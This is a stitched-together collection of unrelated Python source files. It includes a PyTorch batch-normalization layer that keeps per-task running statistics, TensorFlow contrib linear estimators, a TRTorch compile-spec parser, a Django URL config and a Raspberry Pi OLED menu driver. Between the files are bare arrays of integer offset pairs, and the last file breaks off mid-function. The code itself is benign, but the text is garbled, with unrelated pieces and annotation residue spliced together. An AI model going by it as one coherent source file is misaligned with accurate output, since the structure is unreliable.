self.register_buffer('_num_stats', torch.tensor(0, dtype=torch.long))
self._weights = nn.ParameterList()
self._param_shapes = [[num_features], [num_features]]
if affine:
# Gamma
self.register_parameter('scale', nn.Parameter( \
torch.Tensor(num_features), requires_grad=True))
# Beta
self.register_parameter('bias', nn.Parameter( \
torch.Tensor(num_features), requires_grad=True))
self._weights.append(self.scale)
self._weights.append(self.bias)
nn.init.ones_(self.scale)
nn.init.zeros_(self.bias)
elif not learnable_stats:
self._weights = None
if learnable_stats:
# Don't forget to add the new params to `self._weights`.
# Don't forget to add shapes to `self._param_shapes`.
raise NotImplementedError()
elif track_running_stats or frozen_stats:
# Note, in case of frozen stats, we just don't update the stats
# initialized here later on.
self.checkpoint_stats()
else:
mname, vname = self._stats_names(0)
self.register_buffer(mname, None)
self.register_buffer(vname, None)
@property
def weights(self):
"""Getter for read-only attribute :attr:`weights`.
Returns:
A :class:`torch.nn.ParameterList` or ``None``, if no parameters are
internally maintained.
"""
return self._weights
@property
def param_shapes(self):
"""Getter for read-only attribute :attr:`param_shapes`.
Returns:
A list of lists of integers.
"""
return self._param_shapes
@property
def hyper_shapes(self):
"""Getter for read-only attribute :attr:`hyper_shapes`.
Returns:
A list of lists of integers.
"""
# FIXME not implemented attribute. Do we even need the attribute, given
# that all components are individually passed to the forward method?
raise NotImplementedError('Not implemented yet!')
return self._hyper_shapes
@property
def num_stats(self):
"""Getter for read-only attribute :attr:`num_stats`.
Returns:
(int)
"""
return self._num_stats
def forward(self, inputs, running_mean=None, running_var=None, weight=None,
bias=None, stats_id=None):
r"""Apply batch normalization to given layer activations.
        Based on the state of this module (attribute :attr:`training`), the
configuration of this layer and the parameters currently passed, the
behavior of this function will be different.
The core of this method still relies on the function
:func:`torch.nn.functional.batch_norm`. In the following we list the
different behaviors of this method based on the context.
**In training mode:**
We first consider the case that this module is in training mode, i.e.,
:meth:`torch.nn.Module.train` has been called.
Usually, during training, the running statistics are not used when
        computing the output; instead, the statistics computed on the current
batch are used (denoted by *use batch stats* in the table below).
However, the batch statistics are typically updated during training
(denoted by *update running stats* in the table below).
The above described scenario would correspond to passing batch
statistics to the function :func:`torch.nn.functional.batch_norm` and
setting the parameter ``training`` to ``True``.
+----------------------+---------------------+-------------------------+
| **training mode** | **use batch stats** | **update running stats**|
+----------------------+---------------------+-------------------------+
| given stats | Yes | Yes |
+----------------------+---------------------+-------------------------+
| track running stats | Yes | Yes |
+----------------------+---------------------+-------------------------+
| frozen stats | No | No |
+----------------------+---------------------+-------------------------+
| learnable stats | Yes | Yes [1]_ |
+----------------------+---------------------+-------------------------+
|no track running stats| Yes | No |
+----------------------+---------------------+-------------------------+
The meaning of each row in this table is as follows:
- **given stats**: External stats are provided via the parameters
``running_mean`` and ``running_var``.
- **track running stats**: If ``track_running_stats`` was set to
``True`` in the constructor and no stats were given.
- **frozen stats**: If ``frozen_stats`` was set to ``True`` in the
constructor and no stats were given.
- **learnable stats**: If ``learnable_stats`` was set to ``True`` in
the constructor and no stats were given.
- **no track running stats**: If none of the above options apply,
then the statistics will always be computed from the current batch
(also in eval mode).
.. note::
If provided, running stats specified via ``running_mean`` and
``running_var`` always have priority.
.. [1] We use a custom implementation to update the running statistics,
that is compatible with backpropagation.
**In evaluation mode:**
We now consider the case that this module is in evaluation mode, i.e.,
:meth:`torch.nn.Module.eval` has been called.
Here is the same table as above just for the evaluation mode.
+----------------------+---------------------+-------------------------+
| **evaluation mode** | **use batch stats** | **update running stats**|
+----------------------+---------------------+-------------------------+
| track running stats | No | No |
+----------------------+---------------------+-------------------------+
| frozen stats | No | No |
+----------------------+---------------------+-------------------------+
| learnable stats | No | No |
+----------------------+---------------------+-------------------------+
| given stats | No | No |
+----------------------+---------------------+-------------------------+
|no track running stats| Yes | No |
+----------------------+---------------------+-------------------------+
Args:
inputs: The inputs to the batchnorm layer.
running_mean (optional): Running mean stats
:math:`m_{\text{stats}}`. This option has priority, i.e., any
internally maintained statistics are ignored if given.
.. note::
If specified, then ``running_var`` also has to be specified.
running_var (optional): Similar to option ``running_mean``, but for
the running variance stats :math:`v_{\text{stats}}`
.. note::
If specified, then ``running_mean`` also has to be
specified.
weight (optional): The gain factors :math:`\gamma`. If given, any
internal gains are ignored. If option ``affine`` was set to
``False`` in the constructor and this option remains ``None``,
then no gains are multiplied to the "whitened" inputs.
bias (optional): The behavior of this option is similar to option
``weight``, except that this option represents the offsets
:math:`\beta`.
stats_id: This argument is optional except if multiple running
stats checkpoints exist (i.e., attribute :attr:`num_stats` is
greater than 1) and no running stats have been provided to this
method.
.. note::
This argument is ignored if running stats have been passed.
Returns:
The layer activation ``inputs`` after batch-norm has been applied.
"""
assert (running_mean is None and running_var is None or \
running_mean is not None and running_var is not None)
if not self._affine:
if weight is None or bias is None:
raise ValueError('Layer was generated in non-affine mode. ' +
'Therefore, arguments "weight" and "bias" ' +
'may not be None.')
# No gains given but we have internal gains.
# Otherwise, if no gains are given we leave `weight` as None.
if weight is None and self._affine:
weight = self.scale
if bias is None and self._affine:
bias = self.bias
stats_given = running_mean is not None
if (running_mean is None or running_var is None):
if stats_id is None and self.num_stats > 1:
raise ValueError('Parameter "stats_id" is not defined but ' +
'multiple running stats are available.')
elif self._track_running_stats:
if stats_id is None:
stats_id = 0
assert (stats_id < self.num_stats)
rm, rv = self.get_stats(stats_id)
if running_mean is None:
running_mean = rm
if running_var is None:
running_var = rv
elif stats_id is not None:
warn('Parameter "stats_id" is ignored since running stats have ' +
'been provided.')
momentum = self._momentum
if stats_given or self._track_running_stats:
return F.batch_norm(inputs, running_mean, running_var,
weight=weight, bias=bias,
training=self.training, momentum=momentum)
if self._learnable_stats:
raise NotImplementedError()
if self._frozen_stats:
return F.batch_norm(inputs, running_mean, running_var,
weight=weight, bias=bias, training=False)
# TODO implement scale and shift here. Note, that `running_mean` and
# `running_var` are always 0 and 1, resp. Therefore, the call to
# `F.batch_norm` is a waste of computation.
# ret = inputs
# if weight is not None:
# # Multiply `ret` with `weight` such that dimensions are
# # respected.
# pass
# if bias is not None:
# # Add `bias` to modified `ret` such that dimensions are
# # respected.
# pass
# return ret
else:
assert (not self._track_running_stats)
# Always compute statistics based on current batch.
return F.batch_norm(inputs, None, None, weight=weight, bias=bias,
training=True, momentum=momentum)
def checkpoint_stats(self, device=None):
"""Buffers for a new set of running stats will be registered.
Calling this function will also increment the attribute
:attr:`num_stats`.
Args:
device (optional): If not provided, the newly created statistics
will either be moved to the device of the most recent statistics
or to CPU if no prior statistics exist.
"""
assert (self._track_running_stats or \
self._frozen_stats and self._num_stats == 0)
if device is None:
if self.num_stats > 0:
mname_old, _ = self._stats_names(self._num_stats - 1)
device = getattr(self, mname_old).device
if self._learnable_stats:
raise NotImplementedError()
mname, vname = self._stats_names(self._num_stats)
self._num_stats += 1
self.register_buffer(mname, torch.zeros(self._num_features,
device=device))
self.register_buffer(vname, torch.ones(self._num_features,
device=device))
def get_stats(self, stats_id=None):
"""Get a set of running statistics (means and variances).
Args:
stats_id (optional): ID of stats. If not provided, the most recent
stats are returned.
Returns:
(tuple): Tuple containing:
- **running_mean**
- **running_var**
"""
if stats_id is None:
stats_id = self.num_stats - 1
assert (stats_id < self.num_stats)
mname, vname = self._stats_names(stats_id)
running_mean = getattr(self, mname)
running_var = getattr(self, vname)
return running_mean, running_var
def _stats_names(self, stats_id):
"""Get the buffer names for mean and variance statistics depending on
the ``stats_id``, i.e., the ID of the stats checkpoint.
Args:
stats_id: ID of stats.
Returns:
(tuple): Tuple containing:
- **mean_name**
- **var_name**
"""
mean_name = 'mean_%d' % stats_id
var_name = 'var_%d' % stats_id
return mean_name, var_name
if __name__ == '__main__':
pass
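    # --- Usage sketch (illustrative only, not part of the original module) ---
    # A minimal, hedged example of the per-task statistics workflow described in
    # the docstrings above; the feature size (16) and batch size (8) are
    # arbitrary assumptions.
    bn = BatchNormLayer(16, affine=True, track_running_stats=True)
    x = torch.randn(8, 16)
    y_task0 = bn(x, stats_id=0)  # uses the stats checkpoint created in __init__
    bn.checkpoint_stats()        # register a second set of running statistics
    y_task1 = bn(x, stats_id=1)  # forward pass conditioned on the new stats
    print(int(bn.num_stats))     # -> 2, one stats checkpoint per task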
| [
[
[
2305,
2309
],
[
19821,
19825
]
],
[
[
2318,
2323
],
[
9674,
9679
],
[
9696,
9701
],
[
9932,
9937
],
[
10076,
10081
],
[
22271,
22276
],
[
22403,
22408
]
],
[
[
2331,
2345
],
[
2401,
2403
],
[
9734,
9736
],
[
9900,
9902
],
[
10044,
10046
],
[
10228,
10230
],
[
10266,
10268
]
],
[
[
2353,
2377
],
[
20031,
20032
],
[
20338,
20339
],
[
21199,
21200
]
],
[
[
2386,
2400
],
[
7783,
7797
]
]
] |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Linear Estimators."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib import layers
from tensorflow.contrib.framework.python.ops import variables as contrib_variables
from tensorflow.contrib.learn.python.learn.estimators import _sklearn
from tensorflow.contrib.learn.python.learn.estimators import dnn_linear_combined
from tensorflow.contrib.learn.python.learn.estimators import sdca_optimizer
from tensorflow.contrib.learn.python.learn.estimators.base import DeprecatedMixin
from tensorflow.python.framework import ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.platform import tf_logging as logging
# TODO(b/29580537): Replace with @changing decorator.
def _changing(feature_columns):
if feature_columns is not None:
return
logging.warn(
"Change warning: `feature_columns` will be required after 2016-08-01.\n"
"Instructions for updating:\n"
"Pass `tf.contrib.learn.infer_real_valued_columns_from_input(x)` or"
" `tf.contrib.learn.infer_real_valued_columns_from_input_fn(input_fn)`"
" as `feature_columns`, where `x` or `input_fn` is your argument to"
" `fit`, `evaluate`, or `predict`.")
class LinearClassifier(dnn_linear_combined.DNNLinearCombinedClassifier):
"""Linear classifier model.
Train a linear model to classify instances into one of multiple possible
classes. When number of possible classes is 2, this is binary classification.
Example:
```python
education = sparse_column_with_hash_bucket(column_name="education",
hash_bucket_size=1000)
occupation = sparse_column_with_hash_bucket(column_name="occupation",
hash_bucket_size=1000)
education_x_occupation = crossed_column(columns=[education, occupation],
hash_bucket_size=10000)
# Estimator using the default optimizer.
estimator = LinearClassifier(
feature_columns=[occupation, education_x_occupation])
# Or estimator using the FTRL optimizer with regularization.
estimator = LinearClassifier(
feature_columns=[occupation, education_x_occupation],
optimizer=tf.train.FtrlOptimizer(
learning_rate=0.1,
l1_regularization_strength=0.001
))
# Or estimator using the SDCAOptimizer.
estimator = LinearClassifier(
feature_columns=[occupation, education_x_occupation],
optimizer=tf.contrib.learn.SDCAOptimizer(
example_id_column='example_id',
symmetric_l2_regularization=2.0
))
# Input builders
  def input_fn_train(): # returns x, y
    ...
  def input_fn_eval(): # returns x, y
    ...
estimator.fit(input_fn=input_fn_train)
estimator.evaluate(input_fn=input_fn_eval)
estimator.predict(x=x)
```
Input of `fit` and `evaluate` should have following features,
otherwise there will be a `KeyError`:
* if `weight_column_name` is not `None`, a feature with
`key=weight_column_name` whose value is a `Tensor`.
* for each `column` in `feature_columns`:
- if `column` is a `SparseColumn`, a feature with `key=column.name`
whose `value` is a `SparseTensor`.
- if `column` is a `RealValuedColumn`, a feature with `key=column.name`
whose `value` is a `Tensor`.
- if `feature_columns` is `None`, then `input` must contains only real
valued `Tensor`.
"""
def __init__(self,
feature_columns=None,
model_dir=None,
n_classes=2,
weight_column_name=None,
optimizer=None,
gradient_clip_norm=None,
enable_centered_bias=True,
config=None):
"""Construct a `LinearClassifier` estimator object.
Args:
feature_columns: An iterable containing all the feature columns used by
the model. All items in the set should be instances of classes derived
from `FeatureColumn`.
model_dir: Directory to save model parameters, graph and etc.
n_classes: number of target classes. Default is binary classification.
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
optimizer: The optimizer used to train the model. If specified, it should
be either an instance of `tf.Optimizer` or the SDCAOptimizer. If `None`,
the Ftrl optimizer will be used.
gradient_clip_norm: A `float` > 0. If provided, gradients are clipped
to their global norm with this clipping ratio. See
`tf.clip_by_global_norm` for more details.
enable_centered_bias: A bool. If True, estimator will learn a centered
bias variable for each class. Rest of the model structure learns the
residual after centered bias.
config: `RunConfig` object to configure the runtime settings.
Returns:
A `LinearClassifier` estimator.
"""
_changing(feature_columns)
super(LinearClassifier, self).__init__(
model_dir=model_dir,
n_classes=n_classes,
weight_column_name=weight_column_name,
linear_feature_columns=feature_columns,
linear_optimizer=optimizer,
gradient_clip_norm=gradient_clip_norm,
enable_centered_bias=enable_centered_bias,
config=config)
self._feature_columns_inferred = False
# TODO(b/29580537): Remove feature_columns inference.
def _validate_linear_feature_columns(self, features):
if self._linear_feature_columns is None:
self._linear_feature_columns = layers.infer_real_valued_columns(features)
self._feature_columns_inferred = True
elif self._feature_columns_inferred:
this_dict = {c.name: c for c in self._linear_feature_columns}
that_dict = {
c.name: c for c in layers.infer_real_valued_columns(features)
}
if this_dict != that_dict:
raise ValueError(
"Feature columns, expected %s, got %s.", (this_dict, that_dict))
def _get_train_ops(self, features, targets):
"""See base class."""
self._validate_linear_feature_columns(features)
if not isinstance(self._linear_optimizer, sdca_optimizer.SDCAOptimizer):
return super(LinearClassifier, self)._get_train_ops(features, targets)
# SDCA currently supports binary classification only.
if self._target_column.num_label_columns > 2:
raise ValueError(
"SDCA does not currently support multi-class classification.")
global_step = contrib_variables.get_global_step()
assert global_step
logits, columns_to_variables, _ = layers.weighted_sum_from_feature_columns(
columns_to_tensors=features,
feature_columns=self._linear_feature_columns,
num_outputs=self._target_column.num_label_columns,
weight_collections=[self._linear_weight_collection],
scope="linear")
with ops.control_dependencies([self._centered_bias()]):
loss = self._target_column.loss(logits, targets, features)
logging_ops.scalar_summary("loss", loss)
train_ops = self._linear_optimizer.get_train_step(
self._linear_feature_columns, self._target_column.weight_column_name,
"logistic_loss", features, targets, columns_to_variables, global_step)
return train_ops, loss
def _get_eval_ops(self, features, targets, metrics=None):
self._validate_linear_feature_columns(features)
return super(LinearClassifier, self)._get_eval_ops(
features, targets, metrics)
def _get_predict_ops(self, features):
"""See base class."""
self._validate_linear_feature_columns(features)
return super(LinearClassifier, self)._get_predict_ops(features)
@property
def weights_(self):
return self.linear_weights_
@property
def bias_(self):
return self.linear_bias_
class LinearRegressor(dnn_linear_combined.DNNLinearCombinedRegressor):
"""Linear regressor model.
Train a linear regression model to predict target variable value given
observation of feature values.
Example:
```python
education = sparse_column_with_hash_bucket(column_name="education",
hash_bucket_size=1000)
occupation = sparse_column_with_hash_bucket(column_name="occupation",
hash_bucket_size=1000)
education_x_occupation = crossed_column(columns=[education, occupation],
hash_bucket_size=10000)
estimator = LinearRegressor(
feature_columns=[occupation, education_x_occupation])
# Input builders
  def input_fn_train(): # returns x, y
    ...
  def input_fn_eval(): # returns x, y
    ...
estimator.fit(input_fn=input_fn_train)
estimator.evaluate(input_fn=input_fn_eval)
estimator.predict(x=x)
```
  Input of `fit` and `evaluate` should have the following features,
  otherwise there will be a `KeyError`:
* if `weight_column_name` is not `None`:
key=weight_column_name, value=a `Tensor`
* for column in `feature_columns`:
- if isinstance(column, `SparseColumn`):
key=column.name, value=a `SparseTensor`
- if isinstance(column, `RealValuedColumn`):
key=column.name, value=a `Tensor`
- if `feature_columns` is `None`:
      `input` must contain only real-valued `Tensor`s.
"""
def __init__(self,
feature_columns=None,
model_dir=None,
weight_column_name=None,
optimizer=None,
gradient_clip_norm=None,
enable_centered_bias=True,
target_dimension=1,
config=None):
"""Construct a `LinearRegressor` estimator object.
Args:
feature_columns: An iterable containing all the feature columns used by
the model. All items in the set should be instances of classes derived
from `FeatureColumn`.
model_dir: Directory to save model parameters, graph, etc.
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
optimizer: An instance of `tf.Optimizer` used to train the model. If
`None`, will use an Ftrl optimizer.
gradient_clip_norm: A `float` > 0. If provided, gradients are clipped
to their global norm with this clipping ratio. See
`tf.clip_by_global_norm` for more details.
enable_centered_bias: A bool. If True, estimator will learn a centered
bias variable for each class. Rest of the model structure learns the
residual after centered bias.
target_dimension: dimension of the target for multilabels.
config: `RunConfig` object to configure the runtime settings.
Returns:
A `LinearRegressor` estimator.
"""
_changing(feature_columns)
super(LinearRegressor, self).__init__(
model_dir=model_dir,
weight_column_name=weight_column_name,
linear_feature_columns=feature_columns,
linear_optimizer=optimizer,
gradient_clip_norm=gradient_clip_norm,
enable_centered_bias=enable_centered_bias,
target_dimension=target_dimension,
config=config)
self._feature_columns_inferred = False
# TODO(b/29580537): Remove feature_columns inference.
def _validate_linear_feature_columns(self, features):
if self._linear_feature_columns is None:
self._linear_feature_columns = layers.infer_real_valued_columns(features)
self._feature_columns_inferred = True
elif self._feature_columns_inferred:
this_dict = {c.name: c for c in self._linear_feature_columns}
that_dict = {
c.name: c for c in layers.infer_real_valued_columns(features)
}
if this_dict != that_dict:
raise ValueError(
"Feature columns, expected %s, got %s.", (this_dict, that_dict))
def _get_train_ops(self, features, targets):
"""See base class."""
if isinstance(self._linear_optimizer, sdca_optimizer.SDCAOptimizer):
raise ValueError("SDCAOptimizer does not currently support regression.")
self._validate_linear_feature_columns(features)
return super(LinearRegressor, self)._get_train_ops(features, targets)
def _get_eval_ops(self, features, targets, metrics=None):
self._validate_linear_feature_columns(features)
return super(LinearRegressor, self)._get_eval_ops(
features, targets, metrics)
def _get_predict_ops(self, features):
"""See base class."""
self._validate_linear_feature_columns(features)
return super(LinearRegressor, self)._get_predict_ops(features)
@property
def weights_(self):
return self.linear_weights_
@property
def bias_(self):
return self.linear_bias_
# TensorFlowLinearRegressor and TensorFlowLinearClassifier are deprecated.
class TensorFlowLinearRegressor(DeprecatedMixin, LinearRegressor,
_sklearn.RegressorMixin):
pass
class TensorFlowLinearClassifier(DeprecatedMixin, LinearClassifier,
_sklearn.ClassifierMixin):
pass
TensorFlowRegressor = TensorFlowLinearRegressor
TensorFlowClassifier = TensorFlowLinearClassifier
| [
[
[
739,
754
]
],
[
[
778,
786
]
],
[
[
810,
824
]
],
[
[
857,
863
],
[
6389,
6395
],
[
6634,
6640
],
[
7423,
7429
],
[
12281,
12287
],
[
12526,
12532
]
],
[
[
916,
946
],
[
7325,
7342
]
],
[
[
1008,
1016
],
[
13758,
13766
],
[
13894,
13902
]
],
[
[
1078,
1097
],
[
1968,
1987
],
[
8655,
8674
]
],
[
[
1159,
1173
],
[
6993,
7007
],
[
12829,
12843
]
],
[
[
1240,
1255
],
[
13692,
13707
],
[
13826,
13841
]
],
[
[
1296,
1299
],
[
7709,
7712
]
],
[
[
1334,
1345
],
[
7829,
7840
]
],
[
[
1385,
1406
],
[
1542,
1549
]
],
[
[
1467,
1476
],
[
5770,
5779
],
[
11649,
11658
]
],
[
[
1951,
1967
],
[
13843,
13859
],
[
5807,
5823
],
[
7043,
7059
],
[
8241,
8257
],
[
8452,
8468
]
],
[
[
8639,
8654
],
[
13709,
13724
],
[
11686,
11701
],
[
13008,
13023
],
[
13195,
13210
],
[
13405,
13420
]
],
[
[
13666,
13691
],
[
13952,
13977
]
],
[
[
13799,
13825
],
[
14001,
14027
]
],
[
[
13930,
13949
]
],
[
[
13978,
13998
]
]
] |
from typing import List, Dict, Any
import torch
import trtorch._C
from trtorch import _types
def _supported_input_size_type(input_size: Any) -> bool:
if isinstance(input_size, torch.Size):
return True
elif isinstance(input_size, tuple):
return True
elif isinstance(input_size, list):
return True
else:
raise TypeError(
"Input sizes for inputs are required to be a List, tuple or torch.Size or a Dict of three sizes (min, opt, max), found type: "
+ str(type(input_size)))
def _parse_input_ranges(input_sizes: List) -> List:
if any(not isinstance(i, dict) and not _supported_input_size_type(i) for i in input_sizes):
raise KeyError("An input size must either be a static size or a range of three sizes (min, opt, max) as Dict")
parsed_input_sizes = []
for i in input_sizes:
if isinstance(i, dict):
            if all(k in i for k in ["min", "opt", "max"]):
in_range = trtorch._C.InputRange()
in_range.min = i["min"]
in_range.opt = i["opt"]
in_range.max = i["max"]
parsed_input_sizes.append(in_range)
elif "opt" in i:
in_range = trtorch._C.InputRange()
in_range.min = i["opt"]
in_range.opt = i["opt"]
in_range.max = i["opt"]
parsed_input_sizes.append(in_range)
else:
raise KeyError(
"An input size must either be a static size or a range of three sizes (min, opt, max) as Dict")
elif isinstance(i, list):
in_range = trtorch._C.InputRange()
in_range.min = i
in_range.opt = i
in_range.max = i
parsed_input_sizes.append(in_range)
elif isinstance(i, tuple):
in_range = trtorch._C.InputRange()
in_range.min = list(i)
in_range.opt = list(i)
in_range.max = list(i)
parsed_input_sizes.append(in_range)
return parsed_input_sizes
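# Illustrative examples of the accepted input-size forms (a comment sketch, not
# part of the original module); each entry becomes an InputRange with min/opt/max:
#
#   _parse_input_ranges([(1, 3, 224, 224)])             # static: min == opt == max
#   _parse_input_ranges([{"min": (1, 3, 224, 224),
#                         "opt": (1, 3, 512, 512),
#                         "max": (1, 3, 1024, 1024)}])  # dynamic range per input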
def _parse_op_precision(precision: Any) -> _types.dtype:
if isinstance(precision, torch.dtype):
if precision == torch.int8:
return _types.dtype.int8
elif precision == torch.half:
return _types.dtype.half
elif precision == torch.float:
return _types.dtype.float
else:
raise TypeError("Provided an unsupported dtype as operating precision (support: int8, half, float), got: " +
str(precision))
elif isinstance(precision, _types.DataTypes):
return precision
else:
raise TypeError("Op precision type needs to be specified with a torch.dtype or a trtorch.dtype, got: " +
str(type(precision)))
def _parse_device_type(device: Any) -> _types.DeviceType:
if isinstance(device, torch.device):
if device.type == 'cuda':
return _types.DeviceType.gpu
else:
ValueError("Got a device type other than GPU or DLA (type: " + str(device.type) + ")")
elif isinstance(device, _types.DeviceType):
return device
elif isinstance(device, str):
if device == "gpu" or device == "GPU":
return _types.DeviceType.gpu
elif device == "dla" or device == "DLA":
return _types.DeviceType.dla
else:
ValueError("Got a device type other than GPU or DLA (type: " + str(device) + ")")
else:
raise TypeError("Device specification must be of type torch.device, string or trtorch.DeviceType, but got: " +
str(type(device)))
def _parse_compile_spec(compile_spec: Dict[str, Any]) -> trtorch._C.CompileSpec:
info = trtorch._C.CompileSpec()
if "input_shapes" not in compile_spec:
raise KeyError(
"Input shapes for inputs are required as a List, provided as either a static sizes or a range of three sizes (min, opt, max) as Dict"
)
info.input_ranges = _parse_input_ranges(compile_spec["input_shapes"])
if "op_precision" in compile_spec:
info.op_precision = _parse_op_precision(compile_spec["op_precision"])
if "refit" in compile_spec:
assert isinstance(compile_spec["refit"], bool)
info.refit = compile_spec["refit"]
if "debug" in compile_spec:
assert isinstance(compile_spec["debug"], bool)
info.debug = compile_spec["debug"]
if "strict_types" in compile_spec:
assert isinstance(compile_spec["strict_types"], bool)
info.strict_types = compile_spec["strict_types"]
if "allow_gpu_fallback" in compile_spec:
assert isinstance(compile_spec["allow_gpu_fallback"], bool)
info.allow_gpu_fallback = compile_spec["allow_gpu_fallback"]
if "device_type" in compile_spec:
info.device = _parse_device_type(compile_spec["device_type"])
if "capability" in compile_spec:
assert isinstance(compile_spec["capability"], _types.EngineCapability)
info.capability = compile_spec["capability"]
if "num_min_timing_iters" in compile_spec:
assert type(compile_spec["num_min_timing_iters"]) is int
info.num_min_timing_iters = compile_spec["num_min_timing_iters"]
if "num_avg_timing_iters" in compile_spec:
assert type(compile_spec["num_avg_timing_iters"]) is int
info.num_avg_timing_iters = compile_spec["num_avg_timing_iters"]
if "workspace_size" in compile_spec:
assert type(compile_spec["workspace_size"]) is int
info.workspace_size = compile_spec["workspace_size"]
if "max_batch_size" in compile_spec:
assert type(compile_spec["max_batch_size"]) is int
info.max_batch_size = compile_spec["max_batch_size"]
return info
def TensorRTCompileSpec(compile_spec: Dict[str, Any]):
"""
    Utility to create a formatted spec dictionary for using the PyTorch TensorRT backend
Args:
compile_spec (dict): Compilation settings including operating precision, target device, etc.
One key is required which is ``input_shapes``, describing the input sizes or ranges for inputs
to the graph. All other keys are optional. Entries for each method to be compiled.
.. code-block:: py
CompileSpec = {
"forward" : trtorch.TensorRTCompileSpec({
"input_shapes": [
(1, 3, 224, 224), # Static input shape for input #1
{
"min": (1, 3, 224, 224),
"opt": (1, 3, 512, 512),
"max": (1, 3, 1024, 1024)
} # Dynamic input shape for input #2
],
"op_precision": torch.half, # Operating precision set to FP16
"refit": False, # enable refit
"debug": False, # enable debuggable engine
"strict_types": False, # kernels should strictly run in operating precision
"allow_gpu_fallback": True, # (DLA only) Allow layers unsupported on DLA to run on GPU
"device": torch.device("cuda"), # Type of device to run engine on (for DLA use trtorch.DeviceType.DLA)
"capability": trtorch.EngineCapability.DEFAULT, # Restrict kernel selection to safe gpu kernels or safe dla kernels
"num_min_timing_iters": 2, # Number of minimization timing iterations used to select kernels
"num_avg_timing_iters": 1, # Number of averaging timing iterations used to select kernels
"workspace_size": 0, # Maximum size of workspace given to TensorRT
"max_batch_size": 0, # Maximum batch size (must be >= 1 to be set, 0 means not set)
})
}
Input Sizes can be specified as torch sizes, tuples or lists. Op precisions can be specified using
torch datatypes or trtorch datatypes and you can use either torch devices or the trtorch device type enum
to select device type.
Returns:
        torch.classes.tensorrt.CompileSpec: List of methods and formatted spec objects to be provided to ``torch._C._jit_to_tensorrt``
"""
parsed_spec = _parse_compile_spec(compile_spec)
backend_spec = torch.classes.tensorrt.CompileSpec()
for i in parsed_spec.input_ranges:
ir = torch.classes.tensorrt.InputRange()
ir.set_min(i.min)
ir.set_opt(i.opt)
ir.set_max(i.max)
backend_spec.append_input_range(ir)
backend_spec.set_op_precision(int(parsed_spec.op_precision))
backend_spec.set_refit(parsed_spec.refit)
backend_spec.set_debug(parsed_spec.debug)
backend_spec.set_strict_types(parsed_spec.strict_types)
backend_spec.set_allow_gpu_fallback(parsed_spec.allow_gpu_fallback)
backend_spec.set_device(int(parsed_spec.device))
backend_spec.set_capability(int(parsed_spec.capability))
backend_spec.set_num_min_timing_iters(parsed_spec.num_min_timing_iters)
backend_spec.set_num_avg_timing_iters(parsed_spec.num_avg_timing_iters)
backend_spec.set_workspace_size(parsed_spec.workspace_size)
backend_spec.set_max_batch_size(parsed_spec.max_batch_size)
return backend_spec
| [
[
[
19,
23
],
[
593,
597
],
[
584,
588
]
],
[
[
25,
29
],
[
3731,
3735
],
[
5862,
5866
]
],
[
[
31,
34
],
[
138,
141
],
[
2125,
2128
],
[
2873,
2876
],
[
3741,
3744
],
[
5872,
5875
]
],
[
[
42,
47
],
[
182,
187
],
[
2176,
2181
],
[
2214,
2219
],
[
2289,
2294
],
[
2364,
2369
],
[
2926,
2931
],
[
8483,
8488
],
[
8573,
8578
]
],
[
[
55,
65
],
[
988,
995
],
[
1241,
1248
],
[
1662,
1669
],
[
1880,
1887
],
[
3750,
3757
],
[
3785,
3792
]
],
[
[
86,
92
],
[
2133,
2139
],
[
2245,
2251
],
[
2320,
2326
],
[
2396,
2402
],
[
2626,
2632
],
[
2881,
2887
],
[
2994,
3000
],
[
3157,
3163
],
[
3299,
3305
],
[
3389,
3395
],
[
5031,
5037
]
],
[
[
99,
125
],
[
643,
669
]
],
[
[
551,
570
],
[
4058,
4077
]
],
[
[
2094,
2113
],
[
4176,
4195
]
],
[
[
2846,
2864
],
[
4891,
4909
]
],
[
[
3697,
3716
],
[
8429,
8448
]
],
[
[
5828,
5847
]
]
] |
from django.conf.urls import patterns, url
urlpatterns = patterns('appointments.views',
url(r'^appointment/(?P<practice_id>\d+)/$', 'appointment_form', name='appointment_form'),
url(r'^appointment/created/(?P<practice_id>\d+)/$', 'appointment_created', name='appointment_created'),
)
| [
[
[
29,
37
],
[
59,
67
]
],
[
[
39,
42
],
[
94,
97
],
[
188,
191
]
],
[
[
45,
56
]
]
] |
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from rotary_class import RotaryEncoder
class Display():
def __init__(self, disp):
self.disp = disp
self.dimensions = (disp.width, disp.height)
self.image = Image.new('1', self.dimensions)
self.draw = ImageDraw.Draw(self.image)
self.font = ImageFont.truetype("./DejaVuSansMono.ttf", 10)
def display_clear(self):
self.draw.rectangle((0, 0) + self.dimensions, outline = 0, fill = 0)
def init_display(self):
self.disp.begin()
self.disp.clear()
self.disp.display()
self.display_clear()
self.disp.image(self.image)
self.disp.display()
def draw_rows(self, rows, inv_col):
self.display_clear()
for idx, row in enumerate(rows):
if inv_col == idx:
self.draw.rectangle([(0, 10 * idx), (10 * idx + self.dimensions[0], 1 + 10 * idx + 10)], outline = 0, fill = 255)
self.draw.text((1, 10 * idx), row, font = self.font, fill = 0)
else:
self.draw.rectangle([(0, 10 * idx), (10 * idx + self.dimensions[0], 1 + 10 * idx + 10)], outline = 0, fill = 0)
self.draw.text((1, 10 * idx), row, font = self.font, fill = 255)
self.disp.image(self.image)
self.disp.display()
class Menu():
def __init__(self, disp, encoder, items = []):
self.items = items
self.pointer = 0
self.row = 0
self.last_row = 0
self.last_slice = None
self.disp = Display(disp)
self.disp.init_display()
self.draw()
def encoder_ev (direction):
if direction == 1:
self.prev()
elif direction == 2:
self.next()
elif direction == 3:
self.exec_item()
self.encoder = RotaryEncoder(encoder["pin1"], encoder["pin2"], encoder["sw"], encoder_ev)
def draw(self):
tmp_slice = None
if self.row == self.last_row:
if self.last_row == 0:
tmp_slice = self.items[self.pointer:self.pointer + 3]
else:
tmp_slice = self.items[self.pointer - 2:self.pointer + 1]
